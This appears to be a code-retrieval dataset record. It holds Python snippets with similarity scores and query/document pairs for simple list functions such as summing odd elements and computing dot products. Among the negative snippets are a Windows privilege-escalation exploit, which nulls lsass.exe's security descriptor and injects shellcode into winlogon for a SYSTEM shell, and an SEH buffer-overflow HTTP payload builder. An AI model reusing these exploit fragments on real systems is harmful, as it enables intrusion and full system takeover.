"def _exploit(code):\n shellcode_ptr, shellcode_len = _ret_shellcode_buffer() # shellcode virtual allocation\n\n debug_print(\"\\n[*] User-land shellcode allocated at: [0x%x]\\n\" % shellcode_ptr)\n debug_print(hexdump(shellcode_ptr, 32))\n \"\"\"\n 3: kd> !process 0 0 lsass.exe\n PROCESS [87662d40] SessionId: 1 Cid: 0214 Peb: 7ffd9000 ParentCid: 01ac\n DirBase: be6e20e0 ObjectTable: 9aa8a008 HandleCount: 116.\n Image: lsass.exe\n\n 3: kd> dps 87662d40-4\n 87662d3c 8c005e1f => OVERFLOW HERE WITH [0x00000000] \n 87662d40 00260003 AND GET ALL PERMISSIONS OF [lsass.exe] process W/ WHATAEVER USER\n 87662d44 00000001\n 87662d48 87662d48\n 87662d4c 87662d48\n 87662d50 87662d50\n 87662d54 87662d50\n 87662d58 be6e20e0\n 87662d5c 00000000\n 87662d60 00000000\n\n 3: kd> !object 87662d40 \n Object: 87662d40 Type: (85611d58) Process\n ObjectHeader: [87662d28] (new version) => [dt nt!_OBJECT_HEADER 87662d28]\n HandleCount: 10 PointerCount: 106\n\n 3: kd> dt nt!_OBJECT_HEADER 87662d28 \n +0x000 PointerCount : 0n106\n +0x004 HandleCount : 0n10\n +0x004 NextToFree : 0x0000000a Void\n +0x008 Lock : _EX_PUSH_LOCK\n +0x00c TypeIndex : 0x7 ''\n +0x00d TraceFlags : 0 ''\n +0x00e InfoMask : 0x8 ''\n +0x00f Flags : 0 ''\n +0x010 ObjectCreateInfo : 0x82b44cc0 _OBJECT_CREATE_INFORMATION\n +0x010 QuotaBlockCharged : 0x82b44cc0 Void\n +0x014 SecurityDescriptor : 0x8c005e1d Void \n +0x018 Body : _QUAD\n\n 3: kd> !sd (0x8c005e1f - 0x7) => [SecurityDescription from lsass.exe process]\n ->Revision: 0x1\n ->Sbz1 : 0x0\n ->Control : 0x8814\n SE_DACL_PRESENT\n SE_SACL_PRESENT\n SE_SACL_AUTO_INHERITED\n SE_SELF_RELATIVE\n ->Owner : S-1-5-32-544\n ->Group : S-1-5-18\n ->Dacl : \n ->Dacl : ->AclRevision: 0x2\n ->Dacl : ->Sbz1 : 0x0\n ->Dacl : ->AclSize : 0x3c\n ->Dacl : ->AceCount : 0x2\n ->Dacl : ->Sbz2 : 0x0\n ->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n ->Dacl : ->Ace[0]: ->AceFlags: 0x0\n ->Dacl : ->Ace[0]: ->AceSize: 0x14\n ->Dacl : ->Ace[0]: ->Mask : 0x001fffff\n ->Dacl : ->Ace[0]: ->SID: S-1-5-18\n\n ->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n ->Dacl : ->Ace[1]: ->AceFlags: 0x0\n ->Dacl : ->Ace[1]: ->AceSize: 0x18\n ->Dacl : ->Ace[1]: ->Mask : 0x00121411\n ->Dacl : ->Ace[1]: ->SID: S-1-5-32-544\n\n ->Sacl : \n ->Sacl : ->AclRevision: 0x2\n ->Sacl : ->Sbz1 : 0x0\n ->Sacl : ->AclSize : 0x1c\n ->Sacl : ->AceCount : 0x1\n ->Sacl : ->Sbz2 : 0x0\n ->Sacl : ->Ace[0]: ->AceType: SYSTEM_MANDATORY_LABEL_ACE_TYPE\n ->Sacl : ->Ace[0]: ->AceFlags: 0x0\n ->Sacl : ->Ace[0]: ->AceSize: 0x14\n ->Sacl : ->Ace[0]: ->Mask : 0x00000003\n ->Sacl : ->Ace[0]: ->SID: S-1-16-16384\n \"\"\"\n \n lsass_pid = getPidByName(\"lsass.exe\")\n debug_print(\"\\n[!] lsass.exe PID: 0x%x\\n\" % lsass_pid)\n \n leaked_objects = get_handles(lsass_pid) # return lsass.exe handles (nt!_EPROCESS)\n \n #if leaked_objects:\n #debug_print(\"\\n[+] lsass.exe nt!_EPROCESS address leaked!!: [0x%x]\" % leaked_objects)\n \n for leak_obj in leaked_objects:\n\n SecurityDescription = leak_obj - 4 # nullify SecurityDescription located at [_EPROCESS - 4]\n debug_print(\"\\t\\t[*] Address of SecurityDescription to be nullify: [0x%x]\" % SecurityDescription)\n \n payload = struct.pack(\"<L\", SecurityDescription)\n payload_ptr = id(payload) + 0x14\n payload_len = len(payload)\n \n # send custom payload\n _send_payload(\n payload_ptr,\n payload_len,\n code\n )\n\n debug_print(\"[+] Exploit Payload Sent!\")\n debug_print(\"[!] 
Getting nt-authority/SYSTEM impersonated process shell...\")\n \n winlogon_pid = getPidByName(\"winlogon.exe\")\n return inject_shellcode(winlogon_pid) # get SYSTEM shell",
"def code():",
"def pythoncurl():\n return render_template(\n 'pythoncurl.html',\n nav=nav,\n title='Python Curl',\n year=datetime.now().year,\n message='Your application description page.',\n output=output\n )",
"def getCompilerOutput(uname):\n fname = os.path.join(webapp.config['UPLOADED_BUILD_DEST'], uname, 'output').encode('utf8')\n if os.path.exists(fname):\n stdout_file = open(fname, 'r')\n output = unicode(stdout_file.read(), 'utf-8')\n stdout_file.close()\n return output\n else:\n return returnError(\"Output not available for \" + uname, 404)",
"def get_code():\n return inspect.getsource(sieve_of_eratosthenes)",
"def build_buf(shellcode: bytes = b\"\") -> bytes:\n # bad_chars: \\x00\\x20\\x25\\x2b\\x2f\\x5c\n # *************\n # Buffer Layout\n # *************\n #\n # Overwrite w/ 4061 bytes\n # SEH overwrite 0x1002324c : pop esi # pop edi # ret | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll]\n # net jump over seh\n # shellcode\n # pad to 500 bytes\n\n payload = b\"A\" * 4061\n payload += struct.pack(\"<L\", 0x04750674) #nseh\n payload += struct.pack(\"<L\", 0x1002324c) #seh\n payload += shellcode\n payload += b\"\\xcc\" * (5000 - len(payload))\n\n buf = b\"GET \"\n buf += payload\n buf += b\" HTTP/1.1\\r\\n\"\n return buf",
"def __getJumboCmd(self):\n return self.__getCmd(\"JUMBO_HOME\", \"jumbo-converters.jar\", \"JUMBO\")",
"def do_sh(self, none):\n print(\"**** Not Implemented\")",
"def compile_java(self):\n if(self.input == \"\"):\n stderr = subprocess.run(\n [\"javac\", self.id+\".java\"], stderr=subprocess.PIPE).stderr.decode('utf-8')\n if(len(stderr) == 0):\n self.status = 1\n stdout = subprocess.run(\n [\"java\"+self.id], stdout=subprocess.PIPE).stdout.decode('utf-8')\n self.output = stdout\n else:\n self.status = 0\n self.output = stderr\n else:\n pass"
] |
[
"0.65716577",
"0.62779516",
"0.5901102",
"0.5884757",
"0.58177274",
"0.5609137",
"0.5590681",
"0.5558408",
"0.5501154",
"0.5491614",
"0.5461308",
"0.5412035",
"0.53937984",
"0.5315008",
"0.53004134",
"0.52274543",
"0.5221554",
"0.52188283",
"0.5174355",
"0.5173966",
"0.5151633",
"0.5137555",
"0.5124395",
"0.5122991",
"0.511768",
"0.5114628",
"0.50789994",
"0.50689596",
"0.50574845",
"0.50549644"
] |
0.63459843
|
1
|
loop-based function that sums the odd elements in list L
|
def summedOdds(L):
    result = 0
    for e in L:
        if e % 2 != 0:           # e is an odd element
            result = result + e  # accumulate it, or result += e
    return result
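# Quick sanity check (illustrative only; example values are assumed):
# the odd values 1 and 3 are summed, giving 4.
assert summedOdds([1, 2, 3, 4]) == 4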
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def summedOdds(L):\r\n result = 0\r\n for e in L:\r\n if e % 2 == 1:\r\n result = result + e # or result += e\r\n return result",
"def summedOdds( L ):\n result = 0\n for element in L:\n if element %2 ==1: #checking if the current elemnt is odd\n result = result + element # if it is odd, add it to the result, or result += e\n return result",
"def summed(L):\r\n result = 0\r\n for e in L:\r\n result = result + e # or result += e\r\n return result",
"def even_odd_sums(seq):\n even = seq[0::2]\n odd = seq[1::2]\n return [sum(even), sum(odd)]",
"def mono_sum(l):\n r = next(l)\n for m in l: r = r + m\n return r",
"def sum_of_even(numbers):\r\n\r\n\tsum = 0\r\n\tfor i in numbers:\r\n\t\tif (i%2 == 0):\r\n\t\t\tsum += i\r\n\r\n\treturn sum",
"def increment_odds(l):\n odd_increment = []\n for number in l:\n if number % 2 == 1:\n number += 1\n odd_increment.append(number)\n else:\n odd_increment.append(number)\n return odd_increment",
"def sum_of_initial_odds(the_nums):\r\n my_sum = 0\r\n for num in the_nums:\r\n if num % 2 == 0:\r\n # as soon as even number found, we're done\r\n return my_sum\r\n else:\r\n # add odd number to accumulator\r\n my_sum += num\r\n # reached end of list (no even numbers in the_nums)\r\n return my_sum",
"def interleaved_sum(n, odd_term, even_term):\n \"*** YOUR CODE HERE ***\"\n if n == 1:\n return 1\n f = odd_term\n if n % 2 == 0:\n f = even_term\n return f(n) + interleaved_sum(n - 1, odd_term, even_term)",
"def lsum (inlist):\r\n s = 0\r\n for item in inlist:\r\n s = s + item\r\n return s",
"def interleaved_sum(n, odd_term, even_term):\n def sum_helper(i, res):\n if i > n:\n return res\n if i % 2 == 0:\n return sum_helper(i+1, res + even_term(i))\n else:\n return sum_helper(i+1, res + odd_term(i))\n return sum_helper(0, 0)",
"def sum(lst):\n total = 0\n for i in lst:\n total += i\n return total",
"def interleaved_sum(n, odd_term, even_term):\n k = 1\n def odd(k):\n if k > n:\n return 0\n else:\n return odd_term(k) + even(k + 1)\n def even(k):\n if k > n:\n return 0\n else:\n return even_term(k) + odd(k + 1)\n return odd(k)",
"def running_sum(nums_li: List[int]) -> List[int]:\n for i in range(1, len(nums_li)):\n nums_li[i] += nums_li[i - 1]\n return nums_li",
"def get_sum(lst):\n _sum=0\n for i in lst:\n _sum+=i\n return _sum",
"def sumDivisor(inputList):\n result = 0\n for i in inputList:\n result += i\n return result",
"def find_sum( *my_list):\n # a = len(my_list)- 2\n # i = 0\n # suma=0\n # for i in my_list :\n # suma += my_list[i]\n # i+=1\n # return suma\n return sum(my_list)",
"def ll_sum(x):\n xlist = []\n for i in x:\n for num in i:\n xlist.append(num)\n return sum(xlist)",
"def sum_list(numbers):\n\t\n\tif len(numbers) == 0:\n\t\treturn 0 \n\n\tsum = numbers[0] +sum_list(numbers[1:])\n\treturn sum",
"def ll_sum(some_list):\n #This function will return total value of all integers combinded.\n result = 0\n if type(some_list) == list: #Check the element is list or not?\n for i in range(len(some_list)):\n result += ll_sum(some_list[i]) # if it's a list call this function \n #so it will call over and over untill it found element that not a list.\n elif type(some_list) == float or type(some_list) == int: #if it's not list return it value.\n result += some_list\n return result",
"def fn(nums):\n if len(nums) == 1: return nums\n return fn(nums[::2]) + fn(nums[1::2])",
"def sum_unique(l):\n pass",
"def list_sum(lst):\n total = 0\n for ele in range(0, len(lst)):\n total = total + lst[ele]\n return total",
"def ssum(L: list) -> int:\n return 0 if not L else L[0]+ssum(L[1:])",
"def sum_list(list_obj):\r\n sum = 0\r\n for num in list_obj:\r\n sum += num\r\n return sum",
"def only_even(mixed_list):",
"def add_up(num):\n aList = list(range(1, num + 1))\n sum = 0\n\n for item in aList:\n sum = add_together(sum, item)\n# print(\"NOW SUM IS: \" + str(sum))\n\n return sum",
"def sum_evens(the_nums):\r\n my_sum = 0\r\n for num in the_nums:\r\n if num % 2 == 0:\r\n my_sum += num\r\n return my_sum",
"def postitionalSum(list1, list2):\r\n\r\n myList = []\r\n\r\n if list1 == []:\r\n return []\r\n else:\r\n myList.append(list1[0]+list2[0])\r\n list1.remove(list1[0]), list2.remove(list2[0])\r\n postitionalSum(list1, list2)\r\n return myList",
"def sumValues(aList):\r\n sum = 0\r\n for d in aList:\r\n sum += d\r\n return sum"
] |
[
"0.8202531",
"0.818297",
"0.72264755",
"0.7155077",
"0.6779432",
"0.6763767",
"0.67523843",
"0.67198855",
"0.67146987",
"0.6634213",
"0.66224146",
"0.6493464",
"0.647851",
"0.6451017",
"0.6442839",
"0.6419634",
"0.6373533",
"0.6341522",
"0.61926824",
"0.61879593",
"0.6172271",
"0.60794777",
"0.6063576",
"0.6054695",
"0.6042873",
"0.60302347",
"0.60266525",
"0.60129243",
"0.60128284",
"0.6011553"
] |
0.84245884
|
0
|
Loop-based function that finds the dot product of the lists L and K
|
def dot(L,K):
result = 0
if len(L) != len(K):
result = 0
else:
for x in range(len(L)):
result = result + (L[x]*K[x])
return result
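# Quick sanity check (illustrative only; example values are assumed):
# 1*4 + 2*5 + 3*6 = 32, and mismatched lengths fall back to 0.
assert dot([1, 2, 3], [4, 5, 6]) == 32
assert dot([1, 2], [1, 2, 3]) == 0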
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def dotproduct(v1, v2):\n\treturn sum(imap(operator.mul, v1, v2))",
"def dot_prod(u,v):\n each_product = []\n for i in range(len(u)):\n each_product.append(u[i] * v[i])\n return sum(each_product)",
"def dot_product(v1, v2):\n #print(v1, v2)\n sum = 0\n\n for i in range(len(v1)):\n #print(v1[i], v2[i])\n sum += v1[i] * v2[i]\n return sum",
"def dotproduct(x, y):\n return sum(imap(operator.mul, x, y))",
"def dot_product(u, v):\n sum_of_products = 0\n if u!= None:\n if v!= None:\n for combo in zip(u, v):\n sum_of_products += (combo[0] * combo[1])\n return sum_of_products",
"def dot_product(v, w):\n return sum(v_i * w_i for v_i, w_i in zip(v, w))",
"def dot_product(a,b):\n return sum(pairwise_mult(a,b))",
"def dotProduct(v1, v2):\n return sum((a * b) for a, b in zip(v1, v2))",
"def get_dot_product(v1,v2):\n #sets default dot product\n dot_product = 0\n \n for key in v2:\n if key in v1:\n # updates the dot product if key is present in both vectors\n dot_product += v1[key]*v2[key]\n #returns final dot product\n return dot_product",
"def dot_product(v,w):\n return v[0] * w[0] + v[1] * w[1]",
"def dot_product(a, b):\n dp = 0.0\n for i, j in zip(a, b):\n dp += i * j\n return dp",
"def dot(a,b):\n acc = 0\n for k in b.keys():\n acc += a[k] * b[k]\n return acc",
"def dot_kf(u, v):\n # TODO: implement the kernel function\n\n counter = 0\n if len(u)==len(v):\n for i in range(len(u)):\n counter = counter + (u[i]*v[i])\n return counter",
"def dot(a, b):\n return sum([a[i]*b[i] for i in range(2)])",
"def dot_product(v1, v2):\n return v1[0]*v2[0] + v1[1]*v2[1] + v1[2]*v2[2]",
"def dot_product(v1, v2):\n return v1[0] * v2[0] + v1[1] * v2[1]",
"def lpDot(v1, v2):\n\tif not isinstance(v1, list) and not isinstance(v2, list):\n\t\treturn v1 * v2\n\telif not isinstance(v1, list):\n\t\treturn lpDot([v1]*len(v2),v2)\n\telif not isinstance(v2, list):\n\t\treturn lpDot(v1,[v2]*len(v1))\n\telse:\n\t\treturn lpSum([lpDot(e1,e2) for e1,e2 in zip(v1,v2)])",
"def dot_product(vec_1:tuple, vec_2:tuple)->float:\n return vec_1[0] * vec_2[0] + vec_1[1] * vec_2[1]",
"def dot_product(vector1, vector2):\n return [reduce_by_multiplication(pair) for pair in zip(vector1, vector2)]",
"def _dot(a, b):\n return np.einsum('ijk,ikl->ijl', a, b)",
"def dotproduct(vec1, vec2, sum=sum, map=map, mul=mul):\n return sum(map(mul, vec1, vec2))",
"def mult(lists, k: int) -> list:\r\n return (np.multiply(lists, k)).tolist()",
"def dotproduct(vec1, vec2):\n import operator\n return sum(map(operator.mul, vec1, vec2))",
"def _listdot(d1, d2):\n return [np.dot(x[0].T, x[1]) for x in zip(d1, d2)]",
"def dotproduct(vec1, vec2):\n return sum((a*b) for a, b in zip(vec1, vec2))",
"def dot(vector01,vector02):\r\n result = 0\r\n # creates the initial value for the result of the dot product\r\n for z in range(len(vector01)):\r\n # for loop which continues as long as there are more values left in the vector \r\n result += vector01[z]*vector02[z]\r\n # the new result is found to be the corresponding values in each vector multiplied and then added together \r\n return result",
"def dot_product(u, v):\n ret = 0.0\n for i in range(len(u)):\n ret += float(float(u[i]) * float(v[i]))\n return ret",
"def dot(self,other):\n if len(self) == len(other):\n res = 0\n for a,b in zip(self,other):\n res += a*b\n return res\n else: \n raise ValueError(\"The length is not matched\")",
"def calc_k_dot_r(self):\n\t\n\tself.k_dot_r = self.k[0]*self.rij[0,:,:,:] + self.k[1]*self.rij[1,:,:,:] + self.k[2]*self.rij[2,:,:,:]\n\t\n\treturn",
"def dot_product(A, B):\n A_rows = len(A)\n A_columns = len(A[0])\n\n B_rows = len(B)\n B_columns = len(B[0])\n\n if (A_columns == B_rows) and (A_rows == 1 and B_columns == 1):\n\n dot_product = []\n \n dot_product.append(sum([A[0][i]*B[i][0] for i in range(A_columns)]))\n\n return float(dot_product)\n \n else:\n print(\"dimensions of vector do not match.\")"
] |
[
"0.7087473",
"0.7082206",
"0.69925463",
"0.6855394",
"0.6757962",
"0.67315555",
"0.67204964",
"0.67034316",
"0.66845644",
"0.6589555",
"0.6563364",
"0.6471573",
"0.64645624",
"0.6464455",
"0.64520186",
"0.64379126",
"0.6426547",
"0.6409601",
"0.6401266",
"0.64010394",
"0.6390998",
"0.63884085",
"0.63883626",
"0.63738877",
"0.63544583",
"0.635285",
"0.6341225",
"0.6313844",
"0.6305197",
"0.6301911"
] |
0.8606569
|
0
|
loop-based function that counts the number of 9s in a given array
|
def count9(L):
result = 0
for x in L:
if x == 9:
result = result + 1
return result
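# Quick sanity check (illustrative only; example values are assumed):
# there are two nines in the input list.
assert count9([9, 1, 9, 5]) == 2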
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def array_count9(nums):\n count = 0\n if len(nums) >= 4:\n for i in range (4):\n if nums[i] == 9:\n count += 1\n return count > 0\n else:\n for i in range (len(nums)):\n if nums[i] == 9:\n count += 1\n return count > 0\n\n # #Better solution:\n # end = len(nums)\n # if end > 4:\n # end = 4\n # for i in range(end):\n # if nums[i] == 9:\n # return True\n # return False",
"def countTriplets(arr, r):\n c_2, c_3 = Counter(), Counter()\n n_triplets = 0\n for e in arr:\n # print(f'arr: {arr}, e: {e}, c_3: {c_3}, c_2: {c_2}, n_triplets: {n_triplets}')\n if e in c_3:\n n_triplets += c_3[e]\n if e in c_2:\n c_3[e*r] += c_2[e]\n c_2[e*r] += 1\n return n_triplets",
"def countZeroes(arr):\n counter = 0\n #sort the array\n arr.sort(reverse=True)\n print(arr)\n n = len(arr)\n print(n)\n\n # Find index of first zero in given array\n first = firstZero(arr, 0, n - 1)\n \n # If 0 is not present at all, return 0\n if (first == -1):\n return 0\n\n for i in range(first,len(arr)):\n if (arr[i] == 0):\n counter += 1\n else:\n break\n\n return counter",
"def count(array, value):\n count = 0\n for i in range (len(array)):\n if (array[i] == value):\n count += 1\n return count",
"def summer_of_69(arr):\n total = 0\n add = True\n for num in arr:\n while add:\n if num != 6:\n total += num\n break\n else:\n add = False\n break\n while not add:\n if num != 9:\n break\n else:\n add = True\n break\n return total",
"def counts(e, x):\n arr = np.asarray(arr)\n return len(np.where(arr == x)[0])",
"def countTriplets1(arr, r):\n from collections import Counter\n arr_dict = Counter()\n ratio_range = []\n triplets = 0\n\n # Build the counter\n for x in arr:\n arr_dict[x] += 1\n\n # Build a list for easier iteration\n for key, value in arr_dict.items():\n ratio_range.append(tuple([key,value]))\n ratio_range.sort()\n \n for y in range(len(ratio_range)-2):\n firstvalue = ratio_range[y][1]\n secondvalue = ratio_range[y+1][1]\n thirdvalue = ratio_range[y+2][1]\n print(ratio_range, firstvalue, secondvalue,thirdvalue)\n\n summedvalue = (firstvalue + secondvalue + thirdvalue) - 3\n triplet_count = 2**summedvalue\n print(summedvalue, triplet_count)\n triplets += triplet_count\n\n return triplets, arr_dict, ratio_range",
"def count(seq):\n\treturn sum(1 for x in seq)",
"def countTriplets4(arr, r):\n from collections import Counter\n arr_dict = {}\n n0 = arr[0]\n max_arr = max(arr)\n ratio_range = {n0: 0}\n triplets = 0\n\n # Build all possible values\n index = n0 \n counter = 1\n while index < max_arr:\n index *= r\n ratio_range[index] = counter\n counter += 1\n if index > max_arr: ratio_range.pop(index)\n \n # Remove anything that isn't a possible value and build the dictionary\n for x in range(len(arr)-1, -1, -1):\n if arr[x] not in ratio_range: \n arr.pop(x)\n continue\n if arr[x] in arr_dict:\n arr_dict[arr[x]] = [x] + arr_dict[arr[x]]\n else:\n arr_dict[arr[x]] = [x]\n if len(arr) < 3: return triplets # return 0 if there are not enough items left in arr to make a triplet\n\n # Iterate backwards through arr starting at index arr[-2]\n for n in range(len(arr)-2, -1, -1):\n item = arr[n]\n item_before = item // r if item // r in ratio_range else 0 # Set to 0 if the next value in the progression does not appear in the input\n item_after = item * r if item * r in ratio_range else 0 # Set to 0 if the previous value in the progression does not appear in the input\n if not item_before or not item_after: continue # Continue in the loop if triplets are not possible with 'item' as 'j'\n \n counter_before = sum(1 for x in arr_dict[item_before] if x < n)\n counter_after = sum(1 for x in arr_dict[item_after] if x > n)\n triplets += counter_before * counter_after\n return triplets",
"def how_many(e, x):\n return count(np.asarray(x) == e)",
"def count_digit(x, i):\n \"\"\" GRAPSTE TON KWDIKA SAS APO KATW \"\"\"\n su = 0\n s = 0\n k = x\n while(i>1):\n x = x//10\n i = i-1\n s = x%10\n while(k>0):\n if((k%10)==s):\n su = su + 1\n k = k//10\n return su",
"def count():",
"def count_numbers(board: list, x: int, y: int):\n nums = []\n for i in range(9):\n # Adds number to list if it finds one in the col or row\n if not board[i][x] == 0:\n nums.append(board[i][x])\n if not board[y][i] == 0:\n nums.append(board[y][i])\n # Does the same as the find_group function, finds the group of the cell\n x_group = x - x % 3\n y_group = y - y % 3\n for i in range(3):\n for z in range(3):\n # Adds group numbers to list\n if not board[y_group + i][x_group + z] == 0:\n nums.append(board[y_group + i][x_group + z])\n # returns the length of unrepeated number in the col, row and group\n return len(set(nums))",
"def test_expand_counts(self):\n c = array([2,0,1,2])\n self.assertEqual(expand_counts(c), array([0,0,2,3,3]))",
"def count_sheeps(arrayOfSheeps):\n count = 0\n for i in arrayOfSheeps:\n if i == True:\n count += 1\n return count",
"def unique_digits(n):\n \"*** YOUR CODE HERE ***\"\n count = 0\n for k in range(0, 10):\n if has_digit(n, k):\n count = count + 1\n return count",
"def monkey_count(n):\n return [i for i in range(1, n + 1)]",
"def count(self, element):\n count = 0\n for i in range(self._length): # Increment count when equal value is found\n if self._arr[i] == element:\n count += 1\n return count",
"def count_colors(cards: np.ndarray) -> np.ndarray:\n result = np.zeros(4, np.int32)\n cards.sum()\n result[0] = (cards[0:9]).sum()\n result[1] = (cards[9:18]).sum()\n result[2] = (cards[18:27]).sum()\n result[3] = (cards[27:36]).sum()\n return result",
"def count_sort(arr: StaticArray) -> StaticArray:\n # finds the maximum element\n maximum = arr[0]\n for index in range(arr.size()):\n if abs(arr[index]) > maximum:\n maximum = abs(arr[index])\n\n # creates max+1 arrays for positives and negatives\n maximum += 1\n count_pos = StaticArray(maximum)\n count_neg = StaticArray(maximum)\n\n # records the number of iterations of an array element\n # by setting the corresponding index position of the count array to the number of iterations\n for index in range(arr.size()):\n current = arr[index]\n\n # positive numbers\n if current > 0:\n if count_pos[current] is None:\n count_pos.set(current, 1)\n else:\n count_pos[current] += 1\n\n # zero\n elif current == 0:\n if count_pos[0] is None:\n count_pos[0] = 1\n else:\n count_pos[0] += 1\n\n # negative numbers\n else:\n if count_neg[abs(current)] is None:\n count_neg.set(abs(current), 1)\n else:\n count_neg[abs(current)] += 1\n\n # sums non-empty spaces and sets empty spaces equal to zero\n length = 0\n # iterate through positive array\n for index in range(count_pos.size()):\n if count_pos[index] is None:\n count_pos[index] = 0\n else:\n length += count_pos[index]\n\n # iterate through negative array\n for index in range(count_neg.size()):\n if count_neg[index] is None:\n count_neg[index] = 0\n else:\n length += count_neg[index]\n\n # create array for the results\n result_array = StaticArray(length)\n\n # adds elements in positive array to results array from largest to smallest\n result_array_index = 0\n last = count_pos.size() - 1\n for index in range(count_pos.size()):\n while count_pos[last] > 0:\n result_array.set(result_array_index, last)\n result_array_index += 1\n count_pos[last] -= 1\n last -= 1\n\n # adds elements in negative array to results array from largest to smallest\n for index in range(count_neg.size()):\n while count_neg[index] > 0:\n result_array.set(result_array_index, -index)\n result_array_index += 1\n count_neg[index] -= 1\n\n return result_array",
"def birthdayCakeCandles(n, ar):\n\n tallest = max(ar)\n return ar.count(tallest)",
"def _count_zero(number):\n zero_count = 0\n while number > 9:\n if number % 10 == 0:\n zero_count += 1\n number /= 10\n else:\n break\n return zero_count",
"def countTriplets3(arr, r):\n from collections import Counter\n from math import factorial\n arr_dict = Counter()\n n0 = arr[0]\n\n # If the ratio 'r' is 1 then this is a special case of combinations\n if r == 1:\n for x in arr:\n if x == n0: arr_dict[x] += 1\n n = arr_dict[n0]\n r2 = 3\n return factorial(n)//(factorial(r2)*factorial(n-r2)), arr_dict\n\n # Main variables for the rest of the function\n max_arr = max(arr)\n ratio_range = [n0]\n triplets = 0\n\n # Build all possible values\n index = n0 \n counter = 0\n while index < max_arr:\n index *= r\n ratio_range.append(index)\n counter += 1\n if ratio_range[-1] > max_arr: ratio_range.pop(-1)\n \n # Build the counter\n for x in arr:\n if x in ratio_range: arr_dict[x] += 1\n\n # With the 1 special case removed, there now cannot be triplets if there are not 3 items in the dict\n if len(arr_dict) < 3: return triplets, arr_dict, ratio_range\n\n for y in range(len(ratio_range)-2):\n firstkey = ratio_range[y]\n secondkey = ratio_range[y+1]\n thirdkey = ratio_range[y+2]\n \n # If there are no triplets then the loop will exit without incrementing triplets \n if firstkey not in arr_dict or secondkey not in arr_dict or thirdkey not in arr_dict: \n continue\n else:\n firstvalue = arr_dict[firstkey]\n secondvalue = arr_dict[secondkey]\n thirdvalue = arr_dict[thirdkey]\n \n triplet_count = (firstvalue) * (secondvalue) * (thirdvalue)\n triplets += triplet_count\n\n return triplets, arr_dict",
"def count_element (input_list):\n counter = 0\n for dummy_i in input_list:\n counter +=1\n return counter",
"def count_to10():\n numberx = 0\n while numberx < 10:\n numberx += 1\n print(numberx)",
"def test_counts(self):\n c = array([5,0,1,1,5,5])\n obs = counts(c)\n exp = array([1,2,0,0,0,3])\n self.assertEqual(obs, exp)\n d = array([2,2,1,0])\n obs = counts(d, obs)\n exp = array([2,3,2,0,0,3])\n self.assertEqual(obs, exp)",
"def Hashtables__Triplets():\n # URL: https://www.hackerrank.com/challenges/count-triplets-1/problem\n ## Passes all tests\n # O(n) ish.\n # dae9ccff5aea4a8ca6e087a7c16bd70d Notability notes\n from collections import defaultdict\n from dataclasses import dataclass\n\n @dataclass\n class I:\n idx: int\n cnt: int\n\n\n def countTriplets(arr, r):\n d = defaultdict(list)\n prev_count = defaultdict(int) #\n triple_count = 0\n for i, v in enumerate(arr):\n prev = v / r # (!) Integer division can be wrong. 17 // 3 -> 5. This builds incorrect previous (5, 17)\n prev_prev = (prev / r, prev)\n\n if prev_prev in d:\n # cnt = sum([i.cnt for i in d[prev_prev]]) # Counting the whole chain can be O(n) ish. Tests 6,11 fail.\n cnt = prev_count[(prev / r, prev, \"sum\")] # Optimization, keep rolling sum. -> O(1)\n triple_count += cnt\n if prev in d:\n prev_c = len(d[prev]) # O(1)\n d[(prev, v)].append(I(i, prev_c))\n prev_count[(prev, v, \"sum\")] += prev_c # Keep rolling su.\n d[v].append(i)\n\n return triple_count\n\n _, r = [int(i) for i in input().split()]\n arr = [float(i) for i in input().split()]\n print(countTriplets(arr, r))\n\n #### wip entries\n # T (Submission 6) -> (integer devision issue.\n # 100000 3\n # 1 17 80 68 5 5 58 17 38 81 26 44 38 6 12 ...\n # expr: 2325652489\n # Act : 667065187 << wrong, under count.\n # ac2 : 19107507001 << wrong, over count. (integer devision issue.\n # ac3: 2325652489",
"def countDigits(n):\n digits = [0]*10\n while n > 0:\n digits[n%10] += 1\n n = n//10\n return digits",
"def countElements(self, nums):\n import sys\n max_n = -sys.maxint\n min_n = sys.maxint\n\n for n in nums:\n max_n = max(n, max_n)\n min_n = min(n, min_n)\n\n count = 0\n for n in nums:\n if min_n < n < max_n:\n count += 1\n return count",
"def sort_012(input_list):\n cnt0=0 # number of 0's in the array\n cnt1=0 # number of 1's in the array\n cnt2=0 # number of 2's in the array\n for num in input_list:\n if num==0:\n cnt0+=1\n elif num==1:\n cnt1+=1\n else:\n cnt2+=1\n\n ans=[0]*cnt0+[1]*cnt1+[2]*cnt2 # form a list with the individual counts\n return ans"
] |
[
"0.70626134",
"0.6769188",
"0.6477547",
"0.6390147",
"0.63446254",
"0.63192827",
"0.6296587",
"0.62494373",
"0.62323403",
"0.6124918",
"0.607212",
"0.6051759",
"0.60271645",
"0.6020566",
"0.59873253",
"0.598094",
"0.59699416",
"0.59053385",
"0.5871887",
"0.58604145",
"0.58533627",
"0.5852384",
"0.5849883",
"0.58493596",
"0.58423936",
"0.583423",
"0.58238715",
"0.5796608",
"0.57857776",
"0.57846224"
] |
0.7521141
|
0
|
State machine to write incoming data into memory
|
def write_sm(self):
while True:
# wait to receive incoming data
(addr, data) = yield self.w_in_pipe.get()
# model write latency
#for i in range(self.write_latency):
yield self.wait_sys_clks(self.write_latency)
# try to write data into memory
if addr in self.mem.keys():
self.mem[addr] = data
else:
print >> sys.stderr, "ERROR: BRAM write_sm: specified address {} is out of range".format(addr)
# indicate write_completion
self.wr_count += 1
if self.w_out_pipe is not None:
done = 1
self.w_out_pipe.put(done)
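# Illustrative client-side sketch (assumption: SimPy-style pipes, mirroring
# the request/response pattern used above; names are not from the source):
#     self.env.process(self.write_sm())    # register the state machine
#     w_in_pipe.put((addr, data))          # issue a write request
#     done = yield w_out_pipe.get()        # wait for the completion flag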
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def TransferMemorySequence():\r\n pass",
"def send_state(self):\n self.state = self.enigma.get_state()\n messages = self.notify_slaves()\n for message in messages:\n self.network.messages_to_slaves.append(message)",
"def update(self):\n self.write_state(bytes([]))",
